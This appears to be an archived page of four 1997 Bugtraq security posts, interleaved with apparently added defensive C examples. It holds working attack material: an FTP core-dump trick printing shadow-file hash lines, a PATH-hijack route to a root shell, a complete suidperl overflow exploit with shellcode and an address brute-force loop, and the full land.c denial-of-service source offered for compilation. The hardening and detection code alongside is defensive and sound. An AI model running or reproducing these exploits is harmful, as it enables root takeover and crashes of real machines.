The OpenNET Project / Index page
Bug In Security Dynamics' FTP server (Version 2.2)


From: sp00n <sp00n@COUPLER.300BAUD.COM>
Subject: Bug In Security Dynamics' FTP server (Version 2.2)
To: BUGTRAQ@NETSPACE.ORG

Hi,

This bug is similar to the Solaris and other ftp core dump bugs, slightly
different though. BTW the machine is a SPARC 20 running 2.5. You can link
files and clobber them with a core to annoy your local sysadmin or, even
better, get /etc/shadow, you get the point... anyways

220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it
:(


Not too useful, you say? Welp, prior to dumping the core you should link it
to ps_data or something like that; then you will get this:

lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
-rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

$ file ps_data
ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

$ strings core | more

noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root
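The post above shows the two ingredients of the leak: a root daemon that still holds /etc/shadow data in memory, and a core file written into a directory the attacker controls. The following is an added example, not code from the post or from the Security Dynamics daemon, showing what such a daemon should do on its own side: refuse to dump core at all while it handles untrusted input (RLIMIT_CORE is POSIX; the prctl() call is a Linux extra and is compiled only there), and wipe the secret as soon as the password check is done. The shadow-style line in the demo is constructed and contains no real hash.

```c
/* Added example, not from the post above: the two things a privileged
 * daemon should do so that a crash in an attacker-chosen cwd cannot
 * deliver its memory through a symlink named "core". RLIMIT_CORE is
 * plain POSIX; the prctl() line is a Linux extra, compiled only there. */
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Refuse to dump core at all. RLIMIT_CORE=0 is honoured by Solaris, the
 * BSDs and Linux; PR_SET_DUMPABLE=0 additionally suppresses the dump
 * independently of the limit and blocks ptrace attach by same-uid
 * processes. Returns 0 on success, -1 on failure. */
int disable_core_dumps(void)
{
    struct rlimit rl;
    rl.rlim_cur = 0;
    rl.rlim_max = 0;                /* hard limit too, so it cannot be raised */
    if (setrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
#ifdef __linux__
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
        return -1;
#endif
    return 0;
}

/* 1 if the soft RLIMIT_CORE is zero, i.e. no core file can be written. */
int core_dumps_disabled(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0)
        return 0;
    return rl.rlim_cur == 0;
}

/* Overwrite secret material through a volatile pointer so the stores are
 * not optimised away; call it as soon as the password check is finished,
 * so a later crash (or a core the admin does allow) has nothing to leak. */
void wipe_secret(void *p, size_t n)
{
    volatile unsigned char *vp = p;
    while (n--)
        *vp++ = 0;
}

/* 1 if the n bytes at p are all zero. */
int is_wiped(const void *p, size_t n)
{
    const unsigned char *b = p;
    while (n--)
        if (*b++ != 0)
            return 0;
    return 1;
}

/* Demo: a constructed shadow-style line (not a real hash) is held only for
 * the duration of the check, then wiped. Returns 1 if the wipe is complete. */
int demo_wipe(void)
{
    char shadow_line[] = "joeuser:$1$constructed$notarealhash:10175:7:28::::";
    /* ... compare the supplied password against shadow_line here ... */
    wipe_secret(shadow_line, sizeof shadow_line);
    return is_wiped(shadow_line, sizeof shadow_line);
}

int main(void)
{
    if (disable_core_dumps() != 0)
        perror("disable_core_dumps");
    printf("core dumps disabled: %d\n", core_dumps_disabled());
    printf("secret wiped:        %d\n", demo_wipe());
    return 0;
}
```

Setting the hard limit as well means a later bug (or a debugger-friendly admin) cannot re-enable dumps in this process; a daemon that needs cores for its own debugging should instead chdir() to a root-owned directory before accepting connections, so the symlink trick has no cwd to work in.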

Date: Wed, 12 Nov 1997 16:30:03 +1100
From: SUID <suid@BOMBER.STEALTH.COM.AU>
Message-Id: <Pine.LNX.3.95.971112162613.31054A-100000@bomber.stealth.com.au>
Subject: Vulnerability in Lizards game
To: BUGTRAQ@NETSPACE.ORG

Greetings.

Recently, looking through the source of the suid root game called Lizards, I
noticed a vulnerability which makes it incredibly trivial for regular users
at the console to gain unauthorized root access.

The exploitable code is found in the main portion of the code, on the
second last line in fact:

---
...

   system("clear");
   return EXIT_SUCCESS;
}

---

As this program does not seem to relinquish root privileges anywhere, it
executes "clear" (supposed to be /usr/bin/clear) as root, assuming
everything is cool. Simply changing the user's PATH environment variable to
something like PATH=.:/usr/games/lizardlib, then creating a symlink (or a
sh script) called "clear" that executes a shell of your liking, will cause
that command to be executed as root when the program exits. Voila, a root
shell.

Of course this requires the game to run smoothly. This game comes with
Slackware 3.4 in the y package.

Lame fix:   chmod -s /usr/games/lizardlib/lizardshi
Better fix: Change the source code, recompile lizards to reference "clear"
            absolutely.

Regards
suid@stealth.com.au
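The "better fix" in the post only closes the PATH hole; the program would still run the helper as root. The following is an added example, not code from Lizards or from the post, of how a setuid-root program should run an external command such as "clear": exec it by absolute path with a fixed environment (so PATH, IFS, LD_* and friends are never consulted), and drop root permanently before the exec so even a hijacked helper runs as the invoking user. The /bin/sh invocation in the demo stands in for /usr/bin/clear; the TERM whitelist is this example's own choice.

```c
/* Added example, not from the Lizards source or the post above: how a
 * setuid-root program should run an external helper such as "clear".
 * Either defence alone defeats the PATH trick; both together are cheap:
 *   1. exec the helper by absolute path with a fixed environment, so the
 *      caller's PATH (and IFS, LD_*, TERMCAP, ...) are never consulted;
 *   2. drop root permanently before the exec, so even a hijacked helper
 *      runs with the invoking user's privileges. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Give up effective and saved privileges for good. Returns 0 on success,
 * -1 if any step failed or root could still be regained afterwards. */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (uid != 0 && setuid(0) == 0)         /* must fail once dropped */
        return -1;
    return (geteuid() == uid && getegid() == gid) ? 0 : -1;
}

/* TERM is the one variable "clear" genuinely needs; pass it through only
 * if it looks like a terminfo name (letters, digits, "-_.+"). */
static int term_is_sane(const char *t)
{
    size_t n = strlen(t);
    if (n == 0 || n > 32)
        return 0;
    for (; *t; t++)
        if (!isalnum((unsigned char)*t) && !strchr("-_.+", *t))
            return 0;
    return 1;
}

/* Run `path` (which must be absolute) with `argv`, as the real user, in a
 * minimal environment. Returns the child's exit status, or -1 on error
 * (errno == EINVAL for a relative name such as "clear"). */
int run_helper(const char *path, char *const argv[])
{
    char term_var[48] = "TERM=vt100";
    char *envp[] = { "PATH=/usr/bin:/bin", term_var, NULL };
    const char *t = getenv("TERM");
    pid_t pid;
    int status;

    if (path == NULL || path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    if (t != NULL && term_is_sane(t))
        snprintf(term_var, sizeof term_var, "TERM=%s", t);

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);
        execve(path, argv, envp);
        _exit(127);                         /* only reached if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demos: the relative name the game used is refused outright, and an
 * absolute helper runs and reports its exit code (here /bin/sh exiting
 * with `code`, standing in for /usr/bin/clear). */
int demo_relative_name_refused(void)
{
    char *argv[] = { "clear", NULL };
    return run_helper("clear", argv) == -1 && errno == EINVAL;
}

int demo_run_sh_exit(int code)
{
    char cmd[32];
    char *argv[] = { "sh", "-c", cmd, NULL };
    snprintf(cmd, sizeof cmd, "exit %d", code);
    return run_helper("/bin/sh", argv);
}

int main(void)
{
    printf("relative name refused: %d\n", demo_relative_name_refused());
    printf("/bin/sh -c 'exit 3' -> %d\n", demo_run_sh_exit(3));
    return 0;
}
```

Note the order in the child: privileges are dropped first, then exec'd; a program that only hard-codes /usr/bin/clear but keeps euid 0 is still one symlink race or one writable directory away from the same root shell.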

Date: Thu, 13 Nov 1997 18:14:28 +0100
From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
To: best-of-security@cyber.com.au
Message-Id: <Pine.LNX.3.95.971113162510.3729B-100000@kerberos.troja.mff.cuni.cz>
Subject: BoS: another buffer overrun in sperl5.003


Summary:

Any user can gain root privileges on an Intel Linux system with suidperl
5.003 (having the suid bit, of course) even if "SUIDBUF" and "two suidperl
security patches" have been applied. Non-Intel / non-Linux platforms may
be affected as well.

Quick fix:

chmod u-s /usr/bin/sperl5.003  (what else?)

Details:

There is a nasty bug in mess() (util.c): it is possible to overflow
its buffer (via sprintf()); mess() tries to detect this situation but
fails to handle the problem properly:

[excerpt from util.c]

    if (s - s_start >= sizeof(buf)) {   /* Ooops! */
        if (usermess)
            fputs(SvPVX(tmpstr), stderr);
        else
            fputs(buf, stderr);
        fputs("panic: message overflow - memory corrupted!\n",stderr);
        my_exit(1);
    }

It does not abort immediately. It prints out an error message and calls
my_exit(1), and this is very bad.

$ perl -v
This is perl, version 5.003 with EMBED
        Locally applied patches:
          SUIDBUF - Buffer overflow fixes for suidperl security

        built under linux at Apr 22 1997 10:04:46
        + two suidperl security patches

$ perl `perl -e "print 'A' x 3000"`
Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
...AAAAAAAAAAAAAAAAA": File name too long
panic: message overflow - memory corrupted!

$ Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
...AAAAAAAAAAAAAAAAA": File name too long
panic: message overflow - memory corrupted!
Segmentation fault (core dumped)

$ gdb /usr/bin/perl core
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
Inc...
(no debugging symbols found)...
Core was generated by `perl AAAAA...'.
Program terminated with signal 11, Segmentation fault.
Reading symbols ...
...
#0  0x41414141 in ?? ()
(gdb)

Voila! 0x41414141 == "AAAA"

The variable called top_env has been overwritten. In fact, it is jmp_buf
and Perl calls longjmp() with it somewhere in my_exit().


Run this and wait for a root prompt:

[exploit code]

#!/usr/bin/perl

# yes, this suidperl exploit is in perl, isn't it wonderful? :)

$| = 1;

$shellcode =
  "\x90" x 512 .            # nops
  "\xbc\xf0\xff\xff\xbf" .  # movl $0xbffffff0,%esp
  # "standard shellcode" by Aleph One
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

# start and end of .data
# adjust this using /proc/*/maps

$databot = 0x080a2000;
$datatop = 0x080ab000;

# trial and error loop

$address = $databot + 4;

while ($address < $datatop) {
  $smash_me =
    $shellcode . ('A' x (2052 - length($shellcode))) .
    (pack("l", $address) x 1000) . ('B' x 1000);
  $pid = fork();
  if (!$pid) {
    exec('/usr/bin/sperl5.003', $smash_me);
    exit(1);   # only reached if exec() itself fails; don't fall into the loop
  }
  else {
    wait;
    if ($? == 0) {
      printf("THE MAGIC ADDRESS WAS %08x\n", $address);
      exit;
    }
  }
  $address += 128;
}

[end of exploit code]


I have tested this on two Red Hat 4.2 systems running on Intel (with
perl-5.003-8 and -9). I am pretty sure any Intel-like Linux having
sperl5.003 is affected.

Other platforms may be affected too.

Perl 5.004 is NOT VULNERABLE.

--Pavel Kankovsky aka Peak (troja.mff.cuni.cz network administration)
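The post pins the failure on two things: sprintf() was allowed to overrun buf, and the "panic" path then called my_exit(), whose longjmp() reads a jmp_buf the overrun had just replaced with 0x41414141. The following is an added example, not code from Perl's util.c or from the post, of the same message-formatting routine done safely: the write is bounded up front with vsnprintf(), so there is nothing to detect afterwards, and the only correct reaction to detected corruption is shown as a function that terminates without consulting any control data in memory. The 1024-byte buffer size and the canary are this example's choice, not Perl's; the 3000-byte file name is constructed to match the post's trigger.

```c
/* Added example, not from Perl's util.c or the post above: the mess()
 * pattern done safely. The 5.003 code let sprintf() write past buf,
 * noticed afterwards, then called my_exit(), which longjmp()s through a
 * jmp_buf (top_env) the overflow had just overwritten, so the "panic"
 * handler itself delivered control to 0x41414141. Two rules follow:
 * bound the write up front so there is nothing to detect, and if a
 * corruption check ever does fire, terminate without trusting any
 * control data that lives in memory. Buffer size is this example's. */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Format into buf[cap]; always NUL-terminates and never writes past
 * buf[cap-1]. Returns 1 if the message had to be truncated, else 0. */
int mess_safe(char *buf, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int need;

    if (cap == 0)
        return 1;
    va_start(ap, fmt);
    need = vsnprintf(buf, cap, fmt, ap);   /* bounded; reports full length */
    va_end(ap);
    if (need < 0) {
        buf[0] = '\0';
        return 1;
    }
    return (size_t)need >= cap;
}

/* The correct reaction to "memory corrupted": no stdio, no atexit
 * handlers, no longjmp. write(2) and abort() consult nothing an overflow
 * could have redirected. (Not called by the demos; it does not return.) */
void corruption_detected(void)
{
    static const char msg[] = "panic: message overflow - memory corrupted!\n";
    (void)write(2, msg, sizeof msg - 1);
    abort();
}

/* Replay the post's trigger, a 3000-byte script name (constructed), into a
 * 1024-byte buffer guarded by a canary. Returns 1 if the output is
 * terminated, flagged truncated, and the canary is untouched. */
int demo_long_name(void)
{
    struct { char buf[1024]; unsigned canary; } m;
    char name[3001];
    int truncated;

    memset(name, 'A', 3000);
    name[3000] = '\0';
    m.canary = 0xdeadbeefu;
    truncated = mess_safe(m.buf, sizeof m.buf,
                          "Can't open perl script \"%s\": %s",
                          name, "File name too long");
    return truncated == 1
        && m.canary == 0xdeadbeefu
        && strlen(m.buf) == sizeof m.buf - 1
        && strncmp(m.buf, "Can't open perl script \"AAAA", 28) == 0;
}

/* A message that fits is passed through unchanged and not flagged. */
int demo_short_name(void)
{
    char buf[64];
    int truncated = mess_safe(buf, sizeof buf,
                              "Can't open perl script \"%s\": %s",
                              "x.pl", "No such file or directory");
    return truncated == 0
        && strcmp(buf, "Can't open perl script \"x.pl\": "
                       "No such file or directory") == 0;
}

int main(void)
{
    printf("long name handled safely: %d\n", demo_long_name());
    printf("short name untouched:     %d\n", demo_short_name());
    return 0;
}
```

The return value of vsnprintf() is the length the full message would have had, which is exactly the "did it fit" test the old code tried to reconstruct from pointer arithmetic after the damage was done.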



Date: Fri, 21 Nov 1997 10:58:39 -0800
From: blast <blast@broder.com>
To: BUGTRAQ@NETSPACE.ORG
Message-Id: <Pine.BSI.3.96.971121105621.1489C-100000@pillbox.broder.com>
Subject: 44BSD port of land.c

For those of you who don't have all the "fancy" LINUX
networking includes, here is a port to 44BSD flavors.
Should compile fine on FreeBSD, NetBSD, OpenBSD, BSDi, etc.
Enjoy.
-blast
   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
   \    Tim Keanini    |         "The limits of my language,            /
   /                   |         are the limits of my world."           \
   \ blast@broder.com  |         --Ludwig Wittgenstein                  /
   \                   +================================================/
   |Key fingerprint =  7B 68 88 41 A8 74 AB EC  F0 37 98 4C 37 F7 40 D6 |
   /    PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html     \
   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


/* land.c by m3lt, FLC
   crashes a win95 box
   Ported by blast and jerm to 44BSD*/

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <errno.h>


/* #include <netinet/ip_tcp.h> */
/* #include <netinet/protocols.h> */

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

/* RFC 1071 one's complement sum over `length` bytes of `data`. The
   accumulator must start at zero (the original left it uninitialised,
   so the checksum depended on stack garbage) and carries have to be
   folded until none remain, not just once. */
u_short checksum(u_short * data,u_short length)
{
        register long value=0;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        while(value>>16)
                value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock,foo;
        char buffer[40];
        struct ip * ipheader=(struct ip *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt mod by blast, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        foo=1;
        if(setsockopt(sock,0,IP_HDRINCL,&foo,sizeof(int))==-1)
        {
                fprintf(stderr,"couldn't set raw header on socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
        ipheader->ip_v=4;
        ipheader->ip_hl=sizeof(struct ip)/4;
        ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);
        ipheader->ip_id=htons(0xF1C);
        ipheader->ip_ttl=255;
        ipheader->ip_p=IPPROTO_TCP;
        ipheader->ip_src=sin.sin_addr;
        ipheader->ip_dst=sin.sin_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet,%d\n",errno);
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}
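land.c above is the sending side. The following is an added example, not code from land.c or from the post, of the receiving side: a classifier that flags a LAND segment (TCP SYN with source address:port equal to destination address:port) from raw IPv4 bytes, together with a correct RFC 1071 checksum so the crafted sample can be verified. It works from byte offsets rather than struct ip / struct tcphdr so it does not depend on BSD versus glibc header layouts. The 40-byte sample packet is constructed to match what land.c emits (10.0.0.5:139 to itself, SYN, id and seq 0xF1C, window 2048); the RFC 1071 test vector is the one in that RFC's numerical example.

```c
/* Added example, not from land.c or the post above: the receiving side.
 * A LAND segment is a TCP SYN whose source address:port equals its
 * destination address:port. The classifier works from byte offsets in a
 * raw IPv4 packet, and the checksum is a full RFC 1071 fold. The sample
 * packet is constructed to match what land.c emits. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Accumulate big-endian 16-bit words of p[0..len) into sum (RFC 1071). */
static uint32_t cksum_add(uint32_t sum, const uint8_t *p, size_t len)
{
    for (; len > 1; p += 2, len -= 2)
        sum += ((uint32_t)p[0] << 8) | p[1];
    if (len)
        sum += (uint32_t)p[0] << 8;             /* odd trailing byte */
    return sum;
}

/* Fold every carry, then complement. Result is in host order. */
static uint16_t cksum_end(uint32_t sum)
{
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

uint16_t in_cksum(const uint8_t *p, size_t len)
{
    return cksum_end(cksum_add(0, p, len));
}

/* TCP checksum over pseudo-header + segment of an IPv4 packet. Over a
 * packet whose th_sum is already correct the result is 0. */
uint16_t tcp_cksum(const uint8_t *pkt, size_t len)
{
    size_t ihl = (pkt[0] & 0x0f) * 4, tcplen = len - ihl;
    uint8_t pseudo[12];

    memcpy(pseudo, pkt + 12, 8);                /* src, dst */
    pseudo[8] = 0;
    pseudo[9] = 6;                              /* IPPROTO_TCP */
    pseudo[10] = (uint8_t)(tcplen >> 8);
    pseudo[11] = (uint8_t)tcplen;
    return cksum_end(cksum_add(cksum_add(0, pseudo, 12), pkt + ihl, tcplen));
}

/* 1 if pkt is a LAND packet: IPv4, TCP, SYN without ACK, src == dst and
 * sport == dport. 0 for anything else, including truncated input. */
int is_land_packet(const uint8_t *pkt, size_t len)
{
    size_t ihl;
    const uint8_t *tcp;

    if (len < 20 || (pkt[0] >> 4) != 4)
        return 0;
    ihl = (pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 20 || pkt[9] != 6)
        return 0;
    tcp = pkt + ihl;
    if ((tcp[13] & 0x12) != 0x02)               /* SYN set, ACK clear */
        return 0;
    return memcmp(pkt + 12, pkt + 16, 4) == 0 && memcmp(tcp, tcp + 2, 2) == 0;
}

/* Recompute IP and TCP checksums of a 20+20 byte SYN in place. */
static void fix_checksums(uint8_t *pkt, size_t len)
{
    uint16_t s;
    pkt[10] = pkt[11] = pkt[36] = pkt[37] = 0;
    s = in_cksum(pkt, 20);   pkt[10] = s >> 8; pkt[11] = (uint8_t)s;
    s = tcp_cksum(pkt, len); pkt[36] = s >> 8; pkt[37] = (uint8_t)s;
}

/* Constructed sample: what land.c sends. Fills 40 bytes, returns length. */
size_t build_land_sample(uint8_t *pkt)
{
    static const uint8_t tmpl[40] = {
        0x45,0x00,0x00,0x28, 0x0f,0x1c,0x00,0x00, 0xff,0x06,0x00,0x00,
        10,0,0,5,  10,0,0,5,                       /* src == dst */
        0x00,0x8b, 0x00,0x8b,                      /* sport == dport == 139 */
        0x00,0x00,0x0f,0x1c, 0x00,0x00,0x00,0x00,  /* seq 0xF1C, ack 0 */
        0x50,0x02, 0x08,0x00, 0x00,0x00, 0x00,0x00 /* off 5, SYN, win 2048 */
    };
    memcpy(pkt, tmpl, sizeof tmpl);
    fix_checksums(pkt, sizeof tmpl);
    return sizeof tmpl;
}

/* RFC 1071 section 3 example: bytes 00 01 f2 03 f4 f5 f6 f7 -> 0x220d. */
uint16_t rfc1071_vector(void)
{
    static const uint8_t d[8] = { 0x00,0x01,0xf2,0x03,0xf4,0xf5,0xf6,0xf7 };
    return in_cksum(d, sizeof d);
}

/* 1 if the constructed LAND packet is flagged and both checksums verify. */
int demo_land_detected(void)
{
    uint8_t pkt[40];
    size_t n = build_land_sample(pkt);
    return is_land_packet(pkt, n) == 1 && in_cksum(pkt, 20) == 0
        && tcp_cksum(pkt, n) == 0;
}

/* 1 if the same SYN from another source (10.0.0.1:40000) is not flagged. */
int demo_normal_syn_not_flagged(void)
{
    uint8_t pkt[40];
    size_t n = build_land_sample(pkt);
    pkt[15] = 1;                                   /* src 10.0.0.1 */
    pkt[20] = 0x9c; pkt[21] = 0x40;                /* sport 40000 */
    fix_checksums(pkt, n);
    return is_land_packet(pkt, n) == 0 && tcp_cksum(pkt, n) == 0;
}

int main(void)
{
    printf("rfc1071 vector 0x%04x, land %d, normal %d\n", rfc1071_vector(),
           demo_land_detected(), demo_normal_syn_not_flagged());
    return 0;
}
```

The same src==dst, sport==dport test is what later kernel and firewall fixes applied at input; checking it before the state machine sees the SYN is what stops the self-connect loop the post exploits.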


Created 1996-2003 by Maxim Chirkov  